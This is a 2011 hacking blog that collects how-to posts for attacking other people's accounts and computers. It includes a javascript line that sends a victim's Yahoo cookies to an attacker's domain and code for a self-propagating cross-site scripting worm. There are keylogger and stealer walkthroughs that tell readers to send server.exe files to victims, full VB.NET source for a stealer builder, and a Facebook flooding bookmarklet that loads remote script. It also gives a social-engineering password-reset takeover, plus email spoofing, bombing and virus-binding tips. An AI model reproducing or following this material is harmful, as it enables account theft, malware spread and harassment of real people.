Saturday, April 30, 2011

THE GOOGLE DATABASE HACK TOOL

Google Hack DB Tool is a database tool with almost 8,000 entries. It allows administrators the ability to check their site for vulnerabilities based on data stored in Google. With Google Hack Database tool you can find out if your website has indexed vulnerabilities in Google.




This can lead to sensitive information disclosure. This way you can find out what Google knows about you. 7974 entries,including 4203 for SQL Injection.

So be sure to scan your public facing web applications frequently and eliminate all vulnerabilities.


Features:




  • Find information disclosure




  • Find sensitive files




  • Find sensitive directories




  • Find vulnerable software




  • Find personal information



  • These tool is really fast and will help to eliminate most of the known vulnerabilities that
    web application developers tend to do easily, simply and most important fast and accurate.



    Download Google Hack Database Tool v1.0: Download

    XBOMBER V.5.0

    PAKISTAN SMS BOMBER

    HACK ADMINISTRATOR PASSWORD IN WINDOWS XP, 7 & VISTA

    If you did lost your password dont worry about this, just follow steps and login to ur admin.

    You Need Blank Cd or floppy and internet Access Cd or floppy writer.

    1. Download this small utility.

    Click Here To Download


    After download you will get zip and iso image file burn it with any burner into a floppy or cd.

    Restart your system and when prompted press enter to boot from the CD.



    Note: If you do not get prompt of boot from CD.Then restart you system and press f2 or f6 or f8 or Esc key(anyone of them should work for your system) before the booting of the windows start.Now you will enter into bios and you should change the boot order from here with the first preference as CD-ROM.And again restart your system

    Now the software will load automatically.It will ask you to select the windows drive and after that provide you with the option of resetting password.

    6 WAYS TO SEND ANONYMOUS EMAILS

    1) sendanonymousemail.net

    This service is perfect for the following: catch a cheating spouse husband or wife., find out if your friend is are real friend ,give warnings to people, inform the police about illegal activities, inform the tax office about tax cheaters, confess your love to somebody, play an email joke with your friends, when your own email service doesn’t work, f your private email is banned by the recipient, report fraud to your boss or institution and many more reasons...




    2) anonymouse.org

    With AnonEmail it is possible to send e-mails without revealing your e-mail address or
    any information about your identity. Therefore you can communicate more freely
    and you do not have to worry that it might cause consequences for you.
    This service allows you to send e-mails without revealing any personal information.
    Protect your privacy, protect your data, protect it for free.



    3) monkeys.com/formmailer

    Enter your desired sender e-mail address, recipient e-mail address(es), subject, and message in the fields on the left, then select the server(s) that you would like to send your message through from the list shown on the right. (Use Ctrl-Click on newer browsers to select multiple servers.)



    4) send-email.org

    This free tool lets you simply send an email message.



    5) anonymousemail.in

    Site dedicated to sending free anonymous email to anyone with an email address. Just fill in the fields below and have an email message sent the receipient. Your as an anonymous send emailer, will able to send fake email to any receiver anonymously



    6) fuzzmail.org



    Enjoy...

    HACK YAHOO ACCOUNT BY STEALING COOKIES TO BROWSER - SESSION HIJACKING

    Hack Yahoo Account by Cookies Stealing very Simple Way, by Cookies Hijacking.
    Follow Steps and Learn.

    This is very Simple Tutorial and working...

    Step 1: Download this Script

    Step 2: Download and extract files into your hard drive.
    Step 3: Create a account in any ftp hosting site i suggested http://110mb.com
    Step 4: Login to your account and upload 4 files into your ftp account... See screenshot below...



    Step 5: Give this  code to victim to run in his browser when he would be logged in to his yahoo account. Yahoo.php is basically cookie stealing script and hacked.php executes the stolen cookies in browser.
    Stolen cookies get stored in directory 'cookies'

    javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));
     
    He would again redirected to his yahoo account.

    Step6. Open the hacked.php . The password is 'explore'.



    You must have got the username of victim's account. Simply Click on it and it would take you to inbox of victim's yahoo account without asking for any password...


    EMAIL SPOOFER - FAKE EMAIL SENDER SOFTWARE

    This simple program allows you to send diffrent emails to people with other email addresses than yourself.
    For example I can send myself an email coming from hackingway@fbi.gov

    Download it Email Spoofer.exe
    Download it Email Spoofer.rar

    SEBBERN'S MAX EMAIL BOMBER

    Features:

    • HTML Body
    • Subject randomizer
    • Multiple attachment support
    • Timeout after 10 failures
    • Multiple receiver support
    • Support loading email list
    • Yahoo and Hotmail support
    • Can use any SMTP server
    Note you need Microsoft framework for run this software,

    THE CROSS SITE SCRIPTING VIRUS

    The following proof of concept demonstrates a XSS virus. The vulnerable environment created is an example scenario required for XSS viruses and does not show an exhaustive set of possible conditions. It illustrates permanent XSS within a web application. In this case, the vulnerability is exploitable via a get request, which allows a trivial virus to be created.
    Initially an instance of the vulnerable web application will be seeded with the self-propagating code. When this code is executed by web browsers, it results in their infection. The infected web browsers connect to random sites and perform the exploiting get request. The injected code will, in turn, infect further vulnerable web applications with the self-propagating code.


    The following crafted permanent XSS exploitable PHP page can be infected with a virus. The page accepts a parameter (param) value and writes it to a file (file.txt). This file is then returned in the request to the browser. The file will contain the previous value of the “param” parameter. If no parameter is passed it will display the file without updating it.


    Web Application: index.php

    Code:
    <?php
    $p=$HTTP_GET_VARS[’param’];
    $filename = “./file.txt”;

    if ($p != “”) {

    $handle=fopen($filename, “wb”);
    fputs($handle, $p);
    fclose($handle);
    }

    $handle = fopen($filename, “r”);

    $contents = fread($handle, filesize($filename));
    fclose($handle);

    print $contents;

    ?>
    This page (index.php) was hosted on multiple virtual servers within a 10.0.0.0/24 subnet. One web application instance was then seeded with the following code which retrieves a javascript file and executes it. Alternatively, it is possible to inject the entire code into the vulnerable applications rather than requesting a javascript file. For simplicity, a javascript file (xssv.jsp) was requested.

    Injected Seed Code:

    Code:
    <iframe name=”iframex” id=”iframex” src=”hidden” style=”display:none”>
    </iframe>
    <script SRC=”http://<webserver>/xssv.js”></script>

    The javascript file that was requested in the example is shown below. Its self-propagation uses an iframe which is periodically reloaded using the loadIframe() function. The target site IP address of the iframe is selected randomly within the 10.0.0.0/24 subnet via the function get_random_ip(). The XSS virus uses a combination of these two functions and the continual periodic invocation using the setInterval() function.


    Javascipt: xssv.jsp

    Code:
    function loadIframe(iframeName, url) {
    if ( window.frames[iframeName] ) {
    window.frames[iframeName].location = url;
    return false;
    }
    else return true;
    }

    function do_request() {

    var ip = get_random_ip();
    var exploit_string = '<iframe name="iframe2" id="iframe2" ' +
    'src="hidden" style="display:none"></iframe> ' +
    '<script SRC="http://<webserver>/xssv.js"></script>';

    loadIframe('iframe2',

    "http://" + ip + "/index.php?param=" + exploit_string);
    }

    function get_random()

    {
    var ranNum= Math.round(Math.random()*255);
    return ranNum;
    }

    function get_random_ip()

    {
    return "10.0.0."+get_random();
    }

    setInterval("do_request()", 10000);



    Viewing the seeded web application caused the browser to infect other web applications within the 10.0.0.0/24 subnet. This infection continued until some, but not all, applications were infected. At this point the browser was manually stopped. Another browser was then used to view one of the newly infected web applications. The virus then continued to infect the remaining uninfected web applications within the subnet.


    This proof of concept shows that under controlled conditions, not dissimilar to a real world environment, a XSS virus can be self-propagating and infectious.

    Conventional Virus Differences

    Conventional viruses reside and execute on the same system. XSS viruses separate these two requirements in a symbiotic relationship between the server and the browser. The execution occurs on the client browser and the code resides on the server.


    Platform indiscrimination also differentiates a XSS virus from its conventional counterparts. This is due to the encapsulation within HTML and the HTTP/HTTPS protocol. These standards are supported on most web browsers running on a variety of operating systems, making cross-site scripting viruses platform independent. This platform independence increases the number of potential web applications that can be infected.

    Infection

    Cross-site scripting virus infection occurs in two stages and usually on at least two devices. As such, there are two kinds of infections that work symbiotically.


    The server is infected with persistent self-propagating code that it doesn't execute. The second stage is browser infection. The injected code is loaded from the site into the non-persistent web browser and executed. The execution then seeks new servers/pages to be exploited and potentially executes its payload. Typically, there will be one infected server to many infected browsers.

    Payload

    Like conventional viruses, XSS viruses are capable of delivering payloads. The payloads will be executed in the browser and have the restriction of HTML compliant code. That is, the payload can perform HTML functions, including javascript.


    Whilst this does pose limitations, XSS viruses are still capable of malicious activity. For example, the payload could deliver a DDOS attack, display spam or contain browser exploits. Future payload capability is likely to be greater due to increasing browser sophistication.

    Disinfection

    The relationship between the server and one browser can be broken by simply shutting down the browser. However, there is currently no means to prevent browser re-infection other than disabling browser functionality.


    Potential disinfection methods will involve the referrer field from the request header. This is due to the fact that the referrer is likely to be logged on web servers where infection has been attempted. Thus, where referrer spoofing hasn't occurred, following the log files will reveal a trail back to the source of the virus.

    Prevention

    A common initial preventative to viral infection is a network level firewall. As HTTP/HTTPS protocols are afforded unfettered access through common firewall configurations, these firewall barriers are ineffectual. A potential remedy to this is an application firewall with the appropriate XSS virus signatures. Whilst unlikely, the most obvious way to prevent XSS viruses is to remove XSS vulnerabilities from web applications.

    Conclusion

    The infectious nature of XSS viruses has been demonstrated within a controlled environment. It was achieved through a purposely crafted vulnerable web application distributed across a subnet. This environment was subsequently infected.


    XSS viruses are a new species. They distinguish themselves from their conventional cousins through the requirement for a server-client symbiotic relationship and their platform independence. These differences have both positive and negative influences on the virulence of infection.


    This paper illustrates that XSS viruses are platform independent and capable of carrying out malicious functions. Whilst there are mitigating factors, these points coupled with the increasing sophistication of web browsers show the threat of XSS viruses. Proactive measures need to be taken in order to combat this threat, before XSS viruses become endemic.

    FACEBOOK AUTO LIKER


    Virus Scan:
    File Info:-
    Report date: 2011-01-29 02:46:45 (GMT 1)
    File name: facebook-auto-liker-exe
    File size: 172032 bytes
    MD5 Hash: 1650c3a80a4ba858c80e0f88863ef9d3
    SHA1 Hash: 4eeaa19033e67a604f43a242ecd5856cd78fff1c
    Detection rate: 0 on 16 (0%) 
    Status: CLEAN

    Detections

    a-squared - 
    Avast - 
    AVG - 
    Avira AntiVir - 
    BitDefender - 
    ClamAV - 
    Comodo - 
    Dr.Web - 
    F-PROT6 - 
    Ikarus T3 - 
    Kaspersky - 
    NOD32 - 
    Panda - 
    TrendMicro - 
    VBA32 - 
    VirusBuster - 

    Scan report generated by
    NoVirusThanks.org


    Download

    100+ HACKING TOOLS


    Hacking Tools in This pack:-

    HOTMAIL HACKING
    YAHOO HACKING
    MSN FUN TOOLS
    FAKE SCREENS/PAGES
    OTHER HACKING TOOLS


    FUN TOOLS Page 1:
    MSN Chat Monitor And Sniffer
    MSN Password Retriever
    MSN Hacker DUC
    Head **** HotMail HAck
    HotMail Hacker XE Edition
    HotMail HAck
    HotMAil Hacker
    MSN Passwords
    MSN Flooder
    MSN Sniffer
    MSN SPY Lite
    HotMail Hacker Gold
    HotMail HAcker Final
    Give me Ur Pass
    HotMail Brute Forcer
    MSN PAssword Finder
    MSN Password Grabber
    Hack MSN Password
    Hack HotMAil Evolution
    MAgic Password Sender
    MSN Locker
    HotMail Killer
    Hot Freeze
    MessenPass
    HotMAil Hack !
    Ice Cold Reload
    HotMail Killer 2
    Nuke MSNPage 2:
    Yahoo Messenger Login Screen
    MSN Messenger 7 Login Screen
    MSN Messenger 5 Login Screen
    MSN Messenger 4.6 Login Screen
    HotMail Login Screen
    Fake Web Pages 2
    Fake Eeb Pages 1
    AOL Killer
    Fake Login HotMail
    B S Spy
    Saria Fake LoginsPage 3:
    Yahoo Password Retrieval
    Yacam
    Yahoo Cracker
    Yahoo Booster
    Yahoo Hack!
    Yahoo Password Stealer
    S H Yahoo Password SenderPage 4:
    NetWork Password Recovery
    Net BIOS Name Scanner
    FTP Password Hacker
    Cable Modem Sniffer
    Port Listening XP
    Blue Port Scanner
    www 2 IP
    XP Killer
    Sniff Password
    Port Scanner
    Fast Resolver
    Domain Scan
    Whois Domain
    NetRes View
    PHPbb Defacer
    Angry IP Scanner
    FTP Brute ForcerPage 5:
    Hook Tool Box
    Smart HAck UpLoader
    Remote Anything
    Post Sage
    PHPbb AttackerPage 6:
    Skinner
    MSN Bomber Man
    Ultimate Nick PopUpz
    MSN 7 Universal Patcher
    Emoticons Creator
    MSN Picture Crawler
    Anti Status Bomb
    MSN Detector
    Multi MSN Loader
    Kitle
    Protect Lithium
    Tray It!
    MSN Block Checker
    MSN Auto Responder
    MSN Virus CleanerDownload and Enjoy hacking


    Download 100 Hacking Tools

    FACEBOOK FLOODER - POST UNLIMITED TEXT ANYWHERE

    Want to flood someone's wall on facebook???

    Looks like someone is annoying you...

    Here i have a neat little javascript that does it all for ya people...

    Step 1: Goto the wall of the person whom you want to flood...

    Step 2: Copy this Code:

    javascript:(a = (b = document).createElement("script")).src = "//imaginemonkeys.com/a.js", b.body.appendChild(a); void(0);

    Step 3: Paste it on the url bar (address bar) and Hit Enter...


    Step 4: When you have done enter it ill ask to you that how much numbers you want to post edit and write there 100 or any you want, then click ok...



    Step 5: Then a new box will open write there message that you want to post and hit ok...

    U have done... Now check the flooded wall...

    FACEBOOK SPAMMER BLACK BOX

    Spam his/her inbox, wall and comments at the same time or just add new friends in less than a minute...

    Download Link

    HACK FACEBOOK ACCOUNT PASSWORD USING KEYLOGGER

    Just Download This File: Download Link...

    KEYLOGGER STAR TOOLS - HACK ANY EMAIL

    Step 1: First You should download star tools key logger Click Here for Download

    Step 2:  Extract rar file and run star tools: after hit will open a bok then go to tools and click on keylogger...
    Step 3: Enter Your gmail id and password and hit build keylogger, 

    After enter email and pass click on build keylogger, after click a server.exe file created automatic in the same directory.

    Step 4: Send this server file send to your victom. when he/she will run this file his all keystrokes will send in your gmail account automatic...

    HOW TO CREATE A VB.NET STEALER

    Step 1) Download VB 2008 HERE or download VB 2010 Beta HERE

    Step 2) Create a Windows Forms Application and add the following:
    • Textbox1 - txtServer
    • Textbox2 - txtuser
    • Textbox3 - txtPW
    • Textbox4 - txtKey
    • Button1 - ButtenCompile
    • Button2 - ButtonClose
    • Button3 - ButtonRandom
    • Radiobutton1 - lblCryptString
    • Label1 - lblSever
    • Label2 - lblUser
    • Label3 - lblPW
    • SaveFileDialog1 - SaveFileDialog1

    Step 3) Above Public Class Form1, put these imports:
    Code:
    Imports System.IO
    Imports System.Security.Cryptography
    Imports System.Text

    Step 4) Under Public Class Form1, put this:

    Code:
    Dim Key As String, Server As String, User As String, Passwort As String

        Dim VB6setting As New Compatibility.VB6.FixedLengthString(500)

        Private Sub Zufall()
            For x = 1 To 20
                Dim Länge As Integer = 23

                Dim ret As String = String.Empty
                Dim SB As New System.Text.StringBuilder()
                Dim Content As String = "1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw!öäüÖÄÜß""§$%&/()=?*#-½¼»«©§Ã†Ã–æåÔ¥¿Ã¿Ã¾Ã»Ã›Ã©Ã§Ã‘"
                Dim rnd As New Random()
                For i As Integer = 0 To Länge - 1
                    SB.Append(Content(rnd.[Next](Content.Length)))
                Next
                txtKey.Text = SB.ToString
            Next x
        End Sub
     
    That will encrypt the FTP info...

    Step 5)
    Under Private Sub ButtenCompile_Click, insert this code:

    Code:
         MsgBox("You did not enter key!", MsgBoxStyle.Exclamation, " Warning!")
                Exit Sub
            End If

            Key = txtKey.Text
            Server = txtServer.Text
            User = txtUser.Text
            Passwort = txtPW.Text

            Call CryptServer()

            With SaveFileDialog1
                .AddExtension = True
                .FileName = "Server"
                .Filter = "Executables (*.exe) | *.exe*"
                .ShowDialog()

                If File.Exists(.FileName) Then
                    File.Delete(.FileName)
                End If

            End With

            Dim SchreibeDatei As New IO.BinaryWriter(New IO.FileStream(SaveFileDialog1.FileName & ".exe", IO.FileMode.Create))
            SchreibeDatei.Write(My.Resources.Stub)
            SchreibeDatei.Close()

            VB6setting.Value = Key & "_" & Server & "_" & User & "_" & Passwort

            FileOpen(1, (SaveFileDialog1.FileName & ".exe"), OpenMode.Binary)
            FilePutObject(1, VB6setting.Value, LOF(1) + 1)
            FileClose(1)

            MsgBox("The server was successfully created!", MsgBoxStyle.Information, "Success")

    That will create the server...

    Step 6) Under Private Sub ButtonRandom_Click, enter this code:

    Code:
    Call Zufall()
     
    This will call the encryption for the FTP info...

    Step 7) Under Private Sub Form1_Load, put this code:

    Code:
    Me.Activate()
            Call Zufall()
            My.Application.MinimumSplashScreenDisplayTime = 5000

    Now, add this Sub. Put it anywhere, but not in any other Sub.

    Code:
    Protected Overrides Sub OnLoad(ByVal e As EventArgs)

            Me.Activate()

            MyBase.OnLoad(e)

        End Sub

    Now, we will add three more Subs. This is the encryption that is used.

    Code:
    Private Sub CryptServer()
            Dim oAesProvider As New RijndaelManaged
            Dim btClear() As Byte

            Dim btSalt() As Byte = New Byte() {1, 2, 3, 4, 5, 6, 7, 8}

            Dim oKeyGenerator As New Rfc2898DeriveBytes(Key, btSalt)

            oAesProvider.Key = oKeyGenerator.GetBytes(oAesProvider.Key.Length)
            oAesProvider.IV = oKeyGenerator.GetBytes(oAesProvider.IV.Length)

            Dim ms As New IO.MemoryStream
            Dim cs As New CryptoStream(ms, _
                oAesProvider.CreateEncryptor(), _
                CryptoStreamMode.Write)
            btClear = System.Text.Encoding.UTF8.GetBytes(Server)
            cs.Write(btClear, 0, btClear.Length)
            cs.Close()
            Server = Convert.ToBase64String(ms.ToArray)
            Call CryptUser()
        End Sub

        Private Sub CryptUser()
            Dim oAesProvider As New RijndaelManaged
            Dim btClear() As Byte

            Dim btSalt() As Byte = New Byte() {1, 2, 3, 4, 5, 6, 7, 8}

            Dim oKeyGenerator As New Rfc2898DeriveBytes(Key, btSalt)

            oAesProvider.Key = oKeyGenerator.GetBytes(oAesProvider.Key.Length)
            oAesProvider.IV = oKeyGenerator.GetBytes(oAesProvider.IV.Length)

            Dim ms As New IO.MemoryStream
            Dim cs As New CryptoStream(ms, _
                oAesProvider.CreateEncryptor(), _
                CryptoStreamMode.Write)
            btClear = System.Text.Encoding.UTF8.GetBytes(User)
            cs.Write(btClear, 0, btClear.Length)
            cs.Close()
            User = Convert.ToBase64String(ms.ToArray)
            Call CryptPW()
        End Sub

        Private Sub CryptPW()
            Dim oAesProvider As New RijndaelManaged
            Dim btClear() As Byte

            Dim btSalt() As Byte = New Byte() {1, 2, 3, 4, 5, 6, 7, 8}

            Dim oKeyGenerator As New Rfc2898DeriveBytes(Key, btSalt)

            oAesProvider.Key = oKeyGenerator.GetBytes(oAesProvider.Key.Length)
            oAesProvider.IV = oKeyGenerator.GetBytes(oAesProvider.IV.Length)

            Dim ms As New IO.MemoryStream
            Dim cs As New CryptoStream(ms, _
                oAesProvider.CreateEncryptor(), _
                CryptoStreamMode.Write)
            btClear = System.Text.Encoding.UTF8.GetBytes(Passwort)
            cs.Write(btClear, 0, btClear.Length)
            cs.Close()
            Passwort = Convert.ToBase64String(ms.ToArray)
        End Sub

    For the closing, put this under Private Sub ButtonClose_Click:

    Code:
    If MsgBox("Do you want to really quit?", MsgBoxStyle.YesNo, "Exit") = MsgBoxResult.Yes Then
                End
            Else
                Exit Sub
            End If

    Ok, here is the full code for the Builder:

    Code:
    Imports System.IO
    Imports System.Security.Cryptography
    Imports System.Text

    Public Class form1

        Dim Key As String, Server As String, User As String, Passwort As String

        Dim VB6setting As New Compatibility.VB6.FixedLengthString(500)

        Private Sub Zufall()
            For x = 1 To 20
                Dim Länge As Integer = 23

                Dim ret As String = String.Empty
                Dim SB As New System.Text.StringBuilder()
                Dim Content As String = "1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw!öäüÖÄÜß""§$%&/()=?*#-½¼»«©§Ã†Ã–æåÔ¥¿Ã¿Ã¾Ã»Ã›Ã©Ã§Ã‘"
                Dim rnd As New Random()
                For i As Integer = 0 To Länge - 1
                    SB.Append(Content(rnd.[Next](Content.Length)))
                Next
                txtKey.Text = SB.ToString
            Next x
        End Sub

        Private Sub ButtenCompile_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles ButtenCompile.Click
            If txtServer.Text = Nothing Then
                MsgBox("You have not specified FTP server!", MsgBoxStyle.Exclamation, " Warning!")
                Exit Sub
            ElseIf txtUser.Text = Nothing Then
                MsgBox("You did not enter FTP user!", MsgBoxStyle.Exclamation, " Warning!")
                Exit Sub
            ElseIf txtPW.Text = Nothing Then
                MsgBox("You have not specified an FTP password", MsgBoxStyle.Exclamation, " Warning!")
                Exit Sub
            ElseIf txtKey.Text = Nothing Then
                MsgBox("You did not enter key!", MsgBoxStyle.Exclamation, " Warning!")
                Exit Sub
            End If

            Key = txtKey.Text
            Server = txtServer.Text
            User = txtUser.Text
            Passwort = txtPW.Text

            Call CryptServer()

            With SaveFileDialog1
                .AddExtension = True
                .FileName = "Server"
                .Filter = "Executables (*.exe) | *.exe*"
                .ShowDialog()

                If File.Exists(.FileName) Then
                    File.Delete(.FileName)
                End If

            End With

            Dim SchreibeDatei As New IO.BinaryWriter(New IO.FileStream(SaveFileDialog1.FileName & ".exe", IO.FileMode.Create))
            SchreibeDatei.Write(My.Resources.Stub)
            SchreibeDatei.Close()

            VB6setting.Value = Key & "_" & Server & "_" & User & "_" & Passwort

            FileOpen(1, (SaveFileDialog1.FileName & ".exe"), OpenMode.Binary)
            FilePutObject(1, VB6setting.Value, LOF(1) + 1)
            FileClose(1)

            MsgBox("The server was successfully created!", MsgBoxStyle.Information, "Success")

        End Sub

        Private Sub ButtonRandom_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles ButtonRandom.Click
            Call Zufall()
        End Sub

        Private Sub form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
            Me.Activate()
            Call Zufall()
            My.Application.MinimumSplashScreenDisplayTime = 5000


        End Sub
        Protected Overrides Sub OnLoad(ByVal e As EventArgs)

            Me.Activate()

            MyBase.OnLoad(e)

        End Sub


        Private Sub CryptServer()
            Dim oAesProvider As New RijndaelManaged
            Dim btClear() As Byte

            Dim btSalt() As Byte = New Byte() {1, 2, 3, 4, 5, 6, 7, 8}

            Dim oKeyGenerator As New Rfc2898DeriveBytes(Key, btSalt)

            oAesProvider.Key = oKeyGenerator.GetBytes(oAesProvider.Key.Length)
            oAesProvider.IV = oKeyGenerator.GetBytes(oAesProvider.IV.Length)

            Dim ms As New IO.MemoryStream
            Dim cs As New CryptoStream(ms, _
                oAesProvider.CreateEncryptor(), _
                CryptoStreamMode.Write)
            btClear = System.Text.Encoding.UTF8.GetBytes(Server)
            cs.Write(btClear, 0, btClear.Length)
            cs.Close()
            Server = Convert.ToBase64String(ms.ToArray)
            Call CryptUser()
        End Sub

        Private Sub CryptUser()
            Dim oAesProvider As New RijndaelManaged
            Dim btClear() As Byte

            Dim btSalt() As Byte = New Byte() {1, 2, 3, 4, 5, 6, 7, 8}

            Dim oKeyGenerator As New Rfc2898DeriveBytes(Key, btSalt)

            oAesProvider.Key = oKeyGenerator.GetBytes(oAesProvider.Key.Length)
            oAesProvider.IV = oKeyGenerator.GetBytes(oAesProvider.IV.Length)

            Dim ms As New IO.MemoryStream
            Dim cs As New CryptoStream(ms, _
                oAesProvider.CreateEncryptor(), _
                CryptoStreamMode.Write)
            btClear = System.Text.Encoding.UTF8.GetBytes(User)
            cs.Write(btClear, 0, btClear.Length)
            cs.Close()
            User = Convert.ToBase64String(ms.ToArray)
            Call CryptPW()
        End Sub

        Private Sub CryptPW()
            Dim oAesProvider As New RijndaelManaged
            Dim btClear() As Byte

            Dim btSalt() As Byte = New Byte() {1, 2, 3, 4, 5, 6, 7, 8}

            Dim oKeyGenerator As New Rfc2898DeriveBytes(Key, btSalt)

            oAesProvider.Key = oKeyGenerator.GetBytes(oAesProvider.Key.Length)
            oAesProvider.IV = oKeyGenerator.GetBytes(oAesProvider.IV.Length)

            Dim ms As New IO.MemoryStream
            Dim cs As New CryptoStream(ms, _
                oAesProvider.CreateEncryptor(), _
                CryptoStreamMode.Write)
            btClear = System.Text.Encoding.UTF8.GetBytes(Passwort)
            cs.Write(btClear, 0, btClear.Length)
            cs.Close()
            Passwort = Convert.ToBase64String(ms.ToArray)
        End Sub

        Private Sub ButtonClose_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles ButtonClose.Click

            If MsgBox("Do you want to really quit?", MsgBoxStyle.YesNo, "Exit") = MsgBoxResult.Yes Then
                End
            Else
                Exit Sub
            End If
        End Sub
    End Class

    You may need to add this dll

    The stub's code is too long to be posted, so here is a download for it.

    It's pretty basic, and open source.


    Download Stub's Code

    Download Stub's Code

    HAZE STEALER - HACK EMAIL ACCOUNTS

    This is a FREE FUD Stealer for all.This steals most of the important site like:

    Firefox Stealer

    Internet Explorer Stealer
    Steam Stealer
    Chrome Stealer
    Filezilla Stealer
    Game Keys
    All Windows Keys
    No-Ip Stealer

    [Image: hazestealer18mex.jpg]




    [Image: hazestealer25vtx.jpg]

    Scans:


    File Info


    Report date: 2010-10-06 18:41:48 (GMT 1)

    File name: haze-stealer-exe
    File size: 1782784 bytes
    MD5 Hash: 0db9387a3e3261e89cf9eb0129fd749f
    SHA1 Hash: 909fc67babf127226cd4ed084a4d6191eb5761b4
    Detection rate: 2 on 16 (13%)
    Status: INFECTED

    Detections


    a-squared -

    Avast -
    AVG -
    Avira AntiVir - SPR/PSW.Messen.FY
    BitDefender -
    ClamAV -
    Comodo -
    Dr.Web -
    F-PROT6 -
    Ikarus T3 -
    Kaspersky -
    NOD32 -
    Panda -
    TrendMicro -
    VBA32 - Trojan-Spy.IEPV
    VirusBuster -

    Scan report generated by

    NoVirusThanks.org

    Download

    Friday, April 29, 2011

    ISTEALER 3.0 - HACK ACCOUNT PASSWORDS


    Step 1: 1st of all go to www.drivehq.com and Create a free ftp account and activate it.
    Step 2: Download istealer 3.0

    Step 3: Extract the download file into you hard drive with winrar Extension or any other compressing/Extracting tool.
    Step 4: Open Isteler Exe File.


    Step 5: 1st in Host box write ftp.drivehq.com
    and in login box enter your user name that you create in drivehq.com i did say this in 1st step.

    if you wanna bind it with any other software then you can bind if not otherwise blank leave this option.

    Step 6: Click on Test Ftp. if open a box with this saying your ftp account work properly. see screenshot.


    Step 7: Click on build...

    Name the file and your file will be created automatically in the same directory.

    Step 8: Send this file to your victim via email or any hosting site, when he/she will open this file. his/her  password will upload in your ftp drivehq account.
    you can see in this screen shot...

    this is the screen when your victim will open your keylogger file his file added,

    In this Screen shot you can see password and email id of your Victim...

    EMISSARY KEYLOGGER - HACK ANY ACCOUNT

    1st You need ti Download Emissary Keylogger
    2nd Open and Extract the file into your hardrive you need winrar

    Make sure that you have Microsoft .Net Framework installed in your Windows. You can download it from 
    www.microsoft.com/net/. Else it won't work...

    3. Then Open Emissary Exe file dont open stub file.


    Enter your Gmail ID and password...

    • Block AV Sites: Blocks VirusScanning Websites on victim's computer
    • Add to Startup: Adds to Startup via Registry
    • Antis: Anubis, BitDefender, Kaspersky, Keyscrambler, Malwarebytes, NOD32, Norman, Ollydbg, Outpost, Wireshark
    • Disable TaskManager: Disable TaskManager on victim's PC
    • Disable Regedit: Disable's Regedit on victim's PC
    Check "Trojan Downloader" to Downloade and Execute a trojan on victim's PC. You can also create a fake error message and scare your victim, like:

    After all click on bild server the exe server file will create in the same directory send this file to your victim.

    Thats it when he/she will run this file you will receive his/her password automatically in your gmail.

    Download Emissary Keylogger

    KEY 1.0 KEYLOGGERS

    Report date: 2011-01-29 14:30:18 (GMT 1)
    File name: getthekey-1-0-exe
    File size: 53760 bytes
    MD5 Hash: fec89753fc76c4b3ac38e78fbfe49a5e
    SHA1 Hash: bcff2a897c63922363d3c75ccce9887608dea909
    Detection rate: 0 on 16 (0%)
    Status: CLEAN

    Detections


    a-squared -

    Avast -
    AVG -
    Avira AntiVir -
    BitDefender -
    ClamAV -
    Comodo -
    Dr.Web -
    F-PROT6 -
    Ikarus T3 -
    Kaspersky -
    NOD32 -
    Panda -
    TrendMicro -
    VBA32 -
    VirusBuster -

    Scan report generated by
    NoVirusThanks.org

    File Info

    Report date: 2011-01-29 14:29:56 (GMT 1)

    File name: stub-exe
    File size: 82432 bytes
    MD5 Hash: 98b5fd46ebb60f1ebef3ed1bced1f5f8
    SHA1 Hash: 722a4d599c277b33154e125dde40d50277b24a01
    Detection rate: 1 on 16 (6%)
    Status: INFECTED

    Detections


    a-squared -

    Avast -
    AVG -
    Avira AntiVir - TR/ATRAPS.Gen
    BitDefender -
    ClamAV -
    Comodo -
    Dr.Web -
    F-PROT6 -
    Ikarus T3 -
    Kaspersky -
    NOD32 -
    Panda -
    TrendMicro -
    VBA32 -
    VirusBuster -

    Scan report generated by
    NoVirusThanks.org

    DOWNLOAD

    HACK FACEBOOK ACCOUNT PASSWORD BY REVERTING/RESETING PASSWORD OF VICTIM

    What is Reverting?

    Reverting is the process of resetting a password without the knowledge of the actual user ! So this is basically a low level of hacking but it does the job for you!


    1. Go to this link:
    http://www.facebook.com/help/contact.php?show_form=hack_login_changed


    That is the form that you will be using in order to hack your user.

    2. Then in "Your E-mail Address" type your E-mail address.

    3. Then apply the following options as in the image below.

    4. Once you have done that,You will have a question asking "Email associated with the compromised account." - In that just type "No" and nothing else other than that !

    5. In "Your contact email address." - Type your own email for you to receive the Password Reset Link.

    6. In the "Full Name of the Account." - Type the Name of your victim if you know.If you don't then:

    a. Try finding the Name of the victim by just searching his/her e-mail on Facebook.
    b. If that doesn't work then google the E-mail address of your Victim,that might give you some details.
    c. If that also doesn't work then use the following sites to get them
    http://com.lullar.com/

    So if you follow one of the above methods you should be getting the Full Name of your victim.Now lets move on to the next step

    7. Date Of Birth" - In this column you have to enter the Birthday of your Victim.If you know him personally then you should be knowing it.If not you can just social engineer him and somehow make him tell it.Once you get it you have to enter it in that.

    8. URL (web address) of your compromised profile." - This is just the profile URL of your Victim which can be got easily(Usually of the form: http://www.facebook.com/profile.php?id=99999)

    9. Now your all set ! Before you submit the form just make sure you recheck the whole form if you have done the right thing.Once you do so just click on "Submit"

    10. Thats it ! You have done it.

    HOW TO HIDE A VIRUS INTO ANOTHER FILE

    There are many ways one can get a virus but in this case he had picked up some bad files on Limewire (P2P file sharing software). The viruses were wrapped up with legitimate music files. In other words, he downloaded the music file, ran the music file and the music file played as usual. What he didn't know is that a virus file was hidden within the music file. How does that happen? We will attempt to explain this.

    Please note that we are not publishing the code we used to do this so others don't download and abuse it!



    First off we need a binder program...
    How to hide a virus

    This program will bind two files together. Now we are going to wrap up our virus file (File1) with our image file (File2). Notice how you can change the file extensions to what ever you want. You can load .exe, .vbs viruses etc... You can also choose that the main file is an image, video or what ever you want.

    How to hide a virus


    Once you have decided on what virus you want to hide and in what type of media file you want to use, you tell the code to run the media file normally but HIDE the virus file (usually runs in console window).

    How to hide a virus


